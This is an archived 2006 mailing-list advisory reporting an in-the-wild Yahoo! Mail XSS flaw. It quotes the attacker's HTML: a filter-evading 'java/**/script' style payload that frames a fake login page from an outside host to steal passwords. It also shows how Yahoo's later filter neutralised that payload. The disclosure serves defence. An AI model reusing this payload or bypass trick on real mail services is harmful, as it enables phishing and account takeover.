lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060428170844.43520.qmail@web54411.mail.yahoo.com>
Date: Fri, 28 Apr 2006 10:08:44 -0700 (PDT)
From: Cesar <cesarc56@...oo.com>
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: [Argeniss] Alert - Yahoo! Mail XSS vulnerability


Yahoo! Mail XSS vulnerability

Description:

Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicius script being executed on users
browsers. On 17 April 2006 I received a message that
when viewed it redirected to a fake Yahoo! Mail login
web page, I could realize about this because a strange
domain was displayed on IE status bar.
When looking at the HTML code I found out that the
message was:

 ...Message text ...<BR><BR><a target="_blank"   
href="www.blabla23.com>"style="background:url\(java/**/script:document.write('<frameset
cols=100% rows=100% border=0
frameboarder=0framespacing=0><frame frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))"></a><p>

You can see that the attacker used some tricks to
bypass filters, but we can't know all the tricks the
attacker used because some chars were removed or
replaced by the filter. That script loaded a fake
Yahoo! Mail login web page in order to steal
passwords.

Yahoo! was contacted and they responded that the issue
was going to be fixed, after that I haven't hear any
news about them. It seems that the issue was fixed
because now the same message is displayed as:

  ...Message text ...<BR><BR><a target="_blank"   
href="www.blabla23.com>"style="background:url\(_java/**/script:document.write('<xframeset
cols=100% rows=100% border=0
frameboarder=0framespacing=0><xframe frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))"></a><p>

Now filters were improved, whenever the word
javascript appears a "_" is appended at the begining,
and a "x" is appended at the begining of dangerous
HTML tags.

Again Yahoo! didn't released any advisory nor
contacted customers about this issue. 
This issue was exploited for long time by malicious
people for stealing passwords and cookies in order to
compromise Yahoo! Mail users accounts, so it's very
important that Yahoo! Mail users change their
passwords just in case their accounts were
compromised.



Cesar.


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam
protection around 
http://mail.yahoo.com 

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ